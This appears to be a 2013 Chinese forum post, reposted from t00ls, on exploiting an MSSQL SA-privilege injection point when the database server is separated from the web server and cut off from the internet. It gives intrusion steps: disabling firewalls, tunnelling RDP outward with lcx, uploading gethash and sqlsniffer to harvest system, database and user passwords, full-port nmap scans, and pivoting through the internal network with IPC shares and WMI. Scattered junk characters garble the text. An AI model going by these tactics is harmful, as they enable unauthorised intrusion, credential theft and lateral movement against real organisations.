当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。- H& E1 t, O- Q4 F
* q7 l1 j, b+ b# X3 I7 U" J9 M
- f0 a( t, Y3 k4 p8 m8 g- X
0 w8 M6 n" I% f4 R, g" z T. X( y$ ySA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
1 x" h2 ]2 Y5 `8 _( n* n
$ r' o: u$ C0 F( ^% t3 ^1 z+ F$ G7 w3 S7 X9 }$ m
一、DB机有公网IP.& d! R) ~- H7 f2 O) P) }
8 \. h# Q) W9 w# R1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.' m* ?. g! Z8 ~; P3 L
: l' F& A7 s2 X4 }% o; Z0 H) S( f0 e3 G4 {! U- \" X5 o0 Z
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
% p% }& J: q& R3 k' x
) `) Q9 l' D# n/ R1 U- C h- u1 k! m- A. F
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com9 y# F+ H' E2 C/ B/ V7 k
7 H( u+ |& U& v9 y5 ?" ]5 ^* O
, B. g) G; g( n) h0 S0 O4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用. ^) [3 B# i; N+ e2 l a0 s
) _ b- s$ h B+ G/ c
6 d; P- u) z, S; t
6 z+ b+ u8 e- I$ [1 q$ C% K. m
二、DB机只有内网IP' o& r' o. D Z' Y3 O' @5 P) I
. F0 ~) P8 X7 X8 b2 y
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.1 m3 w. ^( [: B n. c
t; k2 w# N' R+ x+ G
% c( n/ B: q2 F* ^2:停掉防火墙和IP策略再从内往外扫描.. t' Y1 p2 _0 G( u
3 o- ]9 b M1 L4 R
; u; Y8 s; m0 w8 q O3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
: [# D$ v, @9 T/ M1 Y' [* R% L! E! _# [ A' g% }5 y6 E1 i1 j5 _
2 ?& J, [ k3 M8 _. v7 d4:学会密码规律分析往往会有惊喜.
. B9 r5 J+ P. x4 X. J6 o# L" y/ T
: R5 ^: ]. o. x3 t& m5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等9 f$ R5 U4 U8 f W- A
7 @; D$ J+ L! P* H. B
: \! Q& c& v, E, ~
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对